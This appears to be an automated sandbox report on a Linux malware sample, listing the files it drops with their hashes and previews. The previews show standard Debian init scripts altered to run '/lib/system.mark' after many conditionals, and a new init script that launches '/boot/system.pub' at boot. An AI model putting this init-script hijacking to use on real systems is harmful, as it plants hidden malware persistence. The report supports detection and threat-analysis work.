                        SHA1:E64F610A9E1145F5C930A7B2D1B31D9D301DF237
                        SHA-256:A6854F423BD17C78AD8F61EDBED12417E1DE18CD8F35CB76295CE725CF888A99
                        SHA-512:4D5A50E7EB4FB077574AD2B34C08D10270B5E5246A8C6D7D0CBFDDEC399093206C4D653C7AD6ACB0E211C037D5E4D45F5FC80DEA4CA8B5FB0E2A85C1759E9576
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON || exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1979
                        Entropy (8bit):5.146376682341581
                        Encrypted:false
                        SSDEEP:48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFn2b:7j3FpjhnV5upSYuv3ScJp2b
                        MD5:DA422CE81DD723C1511C06DA133FC27A
                        SHA1:BBC3D860F2A391DCA48430C7C683D101463FA364
                        SHA-256:1F549EBA5DB1AECF858178F62437651FDF2BA032890C4E65D204262DCCBB6F8E
                        SHA-512:A4D88E11ECDD83D280131E788E2610DDA68AABEFF73E54C877341A034689B182A0B6D52DE00E0AB0177D7373740F8CCB16EABF98E17BDA643F2ECEEE3BC985A3
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, Unicode text, UTF-8 text executable
                        Category:dropped
                        Size (bytes):3255
                        Entropy (8bit):5.122590071157076
                        Encrypted:false
                        SSDEEP:96:9JOxb7pmQJ3sQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jwf7XMSIr7nXmL
                        MD5:E85B436BDC8D0D1FAB58603A43BD7F55
                        SHA1:53A674DE137A91FF396048EF8F09B0F306397136
                        SHA-256:0FD1F38334022C7D46F8F429E0461DE6A6F20AC6BB4CF2B3C0C6DF6E44C0E92F
                        SHA-512:8E285B86DE44C4FDDA957F903C9656E777D1F13D713EA84F7EAD5566D4093155E4836281710C855F5092F4C3B0DD9E5F808ABBBCFDE36F0911C732A669476A5D
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -*- coding: utf-8 -*-.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system.mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i
                        Process:/tmp/ausNOyj9by.elf
                        File Type:Bourne-Again shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):168
                        Entropy (8bit):5.03458455286979
                        Encrypted:false
                        SSDEEP:3:TKH/AnsKhWeftXWQfv+NjWRLQ6WYkREpFNF/ebzkRKVFOWSXKWRAIhQ4+:jsKhLtXpv+1W/a2eMJnKWmz
                        MD5:2C9C7188232B53D595FD0541654BBCAC
                        SHA1:7D0AAB87AD2A7663236C5A7251E9EFAB1C47437A
                        SHA-256:C334828BE737392703EF01044BD122F47C9188E0443FC81413F1801486E0EE9F
                        SHA-512:CC841292BF0A1AB588D701BC65AB199520209C82C3AD6038BC12AE7CF8537EDDDBD04E480F5CBF972A0731F64F531063ABEA2D1863E126B8C42C88960A2240C7
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/bash.### BEGIN INIT INFO.#chkconfig: 2345 10 90.#description:system.pub.# Default-Start: 2 3 4 5.# Default-Stop:.### END INIT INFO./boot/system.pub.exit 0
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3102
                        Entropy (8bit):5.045804889605048
                        Encrypted:false
                        SSDEEP:48:78unF1gLpANlduwTebFGB8B4ndfPaHa59zqPN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1aV3B5dNQaVAGvoe2Wtc
                        MD5:979319372C9DA2093D245E5755FF36A6
                        SHA1:9B5DD36873636794D6AE07792E7D4D9DED2C2489
                        SHA-256:28C4D5946FDE3F9F7A846DA9F2E59F6A5A62FCECA7A527205F67A02478528D59
                        SHA-512:89C92D9C74421B4AC6CE6BC46E09859CB72D836B69BDFE144FC8AA83D990FF135070D86C0A1FE225D8DB8CEE8756B67ABE8F117AB247EC7930B8C5E5A967DF0F
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON || exit 0..if [ -r /etc/default/locale ]; then./lib/system.mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3163
                        Entropy (8bit):5.2621448888959215
                        Encrypted:false
                        SSDEEP:48:ietQlU+vdYb5tM7yL7yi47yIrrFML6YRv50JDRABzNfuhCv8Z//UZJ7iu6052m3s:FtQlTd65tp6iNlLLRRQ4AsUk6o2mc
                        MD5:A5AD832AE20F98254D6020CE444485FD
                        SHA1:43408C17AB8386C42B777ED1E38A2C0D0D90FC7E
                        SHA-256:52BF10B965E7EBBC956E2C1C10E8E4280278662428F634459607FDD51B4BBB97
                        SHA-512:A54A09CD8B65D935F28B120AB5AD675FFB23447111D188F152F47FB5164B0D67A09BD25672F9967BABD74C19563F5F48FECE642E6D51ECC3D5088261FBFD8B1F
                        Malicious:true
                        Preview:#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3946
                        Entropy (8bit):5.1533815522152295
                        Encrypted:false
                        SSDEEP:96:uYqy3be4txLsMwqTZLLFFT7aTfNvagXQwj5jNvaYXakeQz:VZbxtXFZPKTfNvawtjNva4n
                        MD5:D79E755001A5DB9E20CEDB6C961025F2
                        SHA1:EDC19EC928BF4DAD45DA256670D819453BB58AE8
                        SHA-256:11069209E8BB5F1A4C1241C0639C07EA11B31E688A7C045936161CFBE5D8FEA2
                        SHA-512:4BF748BD107D2C3340FD95E05FF58B1F1B60C5248C427F0764CD5E99C9EC0495608BC8D0052803714CE2B85E38F9DA03A092AD94E04AF29B345D4721607582A1
                        Malicious:true
                        Preview:#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2707
                        Entropy (8bit):4.999484335058729
                        Encrypted:false
                        SSDEEP:48:92ZPnWGmH6TMV5m11QU7dXCWQgxxsXuHtpyBMbtKxxsDBV/BkH5:92Z/WbZnm11LdyWFxKXuHtcBMbtKxKDc
                        MD5:264DF0349838878E6A342635B4C6AAC6
                        SHA1:FF2FC0C6330DACA16EAAA8FE91CB9B5A80EBA195
                        SHA-256:CB5FA5A488AC0AE34080DAAA79AB37844BCBD9DFD374D6F9E1E9118245A8B3C7
                        SHA-512:A187C35A0DC65DEA6591EE63954B84837A45B33F618BFD94AB8FCD030BC6828F9EE6B523158F5D26679BE651761C90378381D6CA0ACD55D5C477079DF8369AA0
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON || exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1555
                        Entropy (8bit):4.973705475535796
                        Encrypted:false
                        SSDEEP:24:2Xx/YpMr8MICUV7OlfrDNhay+HNCNBlH3U8lrQ5l8u4uuzG:MpuMAMICu7OlN+UBlH3U8lc/ZWzG
                        MD5:17D9A0A3EA1CD82B2A6A20441C80F070
                        SHA1:620A0F1B6910A8599B70373E1395E7C72D31DFD1
                        SHA-256:8E41D01C9F88FCA987C6F56E3BF127AB5A9B2D151AC688748B4E68318701BF5C
                        SHA-512:0DCF1BFA3B51D299B5D3F581CE6AF6B85B95806CC4854EE16451F852AD85C3733A8AC9D1FD887CE01C77B926F762787913D4A8BC19DF7C0260D9E75B6DA5AB25
                        Malicious:true
                        Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1548
                        Entropy (8bit):4.312093274159983
                        Encrypted:false
                        SSDEEP:48:9XfgD1yzyKzYcX/LshGJckS5MJAu8kGh5A9b6:9YQXC/w0SO
                        MD5:4C516D25550878CE2CE024B6E97105DB
                        SHA1:812E84ACA9890069BF1DBDEF175789DB8792F63D
                        SHA-256:DE554C11A0C59B7354F88FD864DDFE7AE79BF3086319418BB27022B155693D85
                        SHA-512:608967AF4BB7490885EA7E8EA8C5CFE2D38A7581FD3E9FE153793414063AC85079D1F3AA530650DF2D1ED47F7EA14A0D1BB38CA1F2F90627B03195D877F69335
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2164
                        Entropy (8bit):4.911228479541638
                        Encrypted:false
                        SSDEEP:24:+mUxLADBzBQYDMAKjqg3UlfbrMZC/tCYJGMsMHwDa1rig/re4NAGg0clXd:l/dtQYxKjRQfbF/oYJbJQAri6KYG
                        MD5:17D2C5E15246E822C28D957F063D1A16
                        SHA1:387E38EC5877238778209A18EA0D930709E7A603
                        SHA-256:25B762063EFF997BB4FFA75852E3E26F08BA0419C341452BA86F17F6734A9448
                        SHA-512:0CC8B7A4D72E05C3F4676B6DD84CF25A660E9E9821D367ACF0D3EE56461EC57441A317389F04A5D0B74415495A499F73FCC968B6A57134A92768D43395E86EBA
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] || exit 0.[ -x /sbin/modprobe ] || exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop|restart|reload|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_action_msg "Loading kernel module $module". modprobe $module $args || true. else. modprobe $module $args > /dev/null 2>&1 || t
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3534
                        Entropy (8bit):5.284950933277381
                        Encrypted:false
                        SSDEEP:48:fbmo8vyUjH3J+cNrWId4KF9wDeXAr/FI/F7R7cJ0IBnrd/g1ZsbHaX1Z4td/Wzvx:d8z3J+cNiRFSzGhJHyUDuxTDld
                        MD5:8134B3B7E43D4BBE6C1F3E7C7C73A7ED
                        SHA1:156CCD1CF7176156A0AD84CDEB5B53868C81712F
                        SHA-256:379A79FE27830ACAE74486161F85FD54A2CC176FEB57D6E48B988147A994403B
                        SHA-512:7604BFF7FE0AE3CDFF0BE20F2E2CD84BA854EBB35829F6CC6EE6837E91F2F0347CB7E86CF831A1C524F6BC80CC9F34185E89F580A2F0D9F42364E5FC00E78960
                        Malicious:true
                        Preview:#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):901
                        Entropy (8bit):5.104600839303824
                        Encrypted:false
                        SSDEEP:12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsQoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/Iwfi2Hjq13O
                        MD5:4F5481561C2CB414FA79507BA03FDEF7
                        SHA1:974F6AE6CE96EDBFA6247B47989CC4EA0D4C5CC6
                        SHA-256:B8183CE4BF57A668EE504129E668E08DBE62FA0DDB7B7E42AABFF52FD7FBBB1D
                        SHA-512:20B7254B833125FFD3449A402C534C9FF7C2A382C3407A35DC22A48B17352D7EFD767FF6A1C0A14FE8A70C2CCDED993A0695AC24D086036340267F4DA051C146
                        Malicious:true
                        Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM || exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system.mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start|stop|restart|force-reload|status}"..exit 1.esac..exit 0..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):604
                        Entropy (8bit):5.317046519159889
                        Encrypted:false
                        SSDEEP:12:wdRDNeBuYryMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Xx/lti9OXylj/
                        MD5:1BB719CD6C1AFE11FFAA22E457222B8B
                        SHA1:8C6D68B8CFD06AD81813E9568F61C029F12D258A
                        SHA-256:282EC5B6FC5F91FD0F569B1B84FA5DBA6C46173479A2A8F2F3B38A6DE6F570AF
                        SHA-512:23015D67D978FA0C37E305E57D74DE0DA8C4E78436E3D0C640C52C355CB301A25799898C722FD6BDACF6BF85DE0A0E590CBC8C6624DD86D39AD59800BD6491E7
                        Malicious:true
                        Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2518
                        Entropy (8bit):5.328823038467521
                        Encrypted:false
                        SSDEEP:48:7HvaUX9Q3esRt3uK4PWNr/42iwk3qmA4JO4pTjmCjVwUH:7PaUX0eSt3BacznDsbjmCjVwS
                        MD5:70A5C40B509AEA9932FA851AD70ACB57
                        SHA1:463305EFCF59020D68D1E2111298EE20612D0D73
                        SHA-256:04F0D49C9370F56A6BC18A6CCDE3672D5B1A8765E6522C5C55D97CCF8A21AE5C
                        SHA-512:E9BF78D0D63370C7C4ED5BA1CDFD3BA2A3269269EFEC61C1027CC1FD37496CE6F179E8BDBB5554C23234744CEFE39C3CB7964C22C8A99618E83160D3E0DC879B
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON || exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system.mark. exit 0.fi..if [ ! -e $MO
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2964
                        Entropy (8bit):5.319082661316184
                        Encrypted:false
                        SSDEEP:48:7HUksR9JmtLLCDCJ9ETaPn1PCDCJ9ETafOBUV1kqH2fQuEfg64U149Hh7KKSKMs:7HUkwbmhmDr+Pn1qDr+2qV1RHSQuav4D
                        MD5:FA339A7172040C330DC30E65E29BE1D1
                        SHA1:F558AD0D3435E5F9E486820B9844031CF83450B1
                        SHA-256:7C1F374BB9BBDB94BE70ED2E096594A97C0A8E4A79F28F7D5789A0BE7BCE4983
                        SHA-512:C5E80E9CBB87EE001E60B84D8A89464BE8661EAD8CAF2453A20B8073EF0CF87524FF1959FF1020F363F7341A3938614FBA6258FFE145AF1B4DD826D5DA5D923B
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system.mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system.mark.for slave in slaves/*;.do..if [ "$slave" = "slaves/*" ]; then./lib/system.mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath | sed -n "s/\(.*\): .* $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system.mark....log_daemon_msg "Root is on a multipathed device, multipathd c
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2589
                        Entropy (8bit):5.114269594803135
                        Encrypted:false
                        SSDEEP:48:7UMRMrEm3cy8NL/NgZlfHMtWBAl3ATeTPAdWI4RdWdtRHg02AC9ArANTcAhicF:7b2rH338lmZlfs/lwA4dWI6C7DUbL
                        MD5:B48EB035141800F7976971DFDB30D671
                        SHA1:18D8B59AD64232DEBB186270DA8172D0C1DE47A8
                        SHA-256:E28FD9022AC23B3ED07D6223DC2EAA12DDE98FAA3D8AF142CB091C9C58ACB3A3
                        SHA-512:7D617DC4E0DA0BE90FB869253093E122A9EF3F78AE0F838167BDF210AA0310A2E753EB2E22B45A9BE4E05C4DDE711AE0768BC3CF21650D990F3BFF29D4D59EA7
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] || exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system.mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system.mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] || ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1881
                        Entropy (8bit):4.866964949464276
                        Encrypted:false
                        SSDEEP:48:1a/f0aOHh8R/X/DA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB8Rk4e8j8Q8Ml8OmooG2D3k
                        MD5:97AC49C2355ACB94890353EE4381A945
                        SHA1:D847EF688D5785E54FB463C2E00B0922BA0E4060
                        SHA-256:86FBD32099B190A52DFF0ADCFB72BE3F9C13C3A6F47DE40EA3DF1E056B9616B5
                        SHA-512:FA42FE8BD21D8C08CD437817F9E29EEED43961E13E3E0456E42696921D14BCD307A0E38580D2DD97D5D5F0A23BF8523748BAB6AA1187D227EE7F5DD99207911E
                        Malicious:true
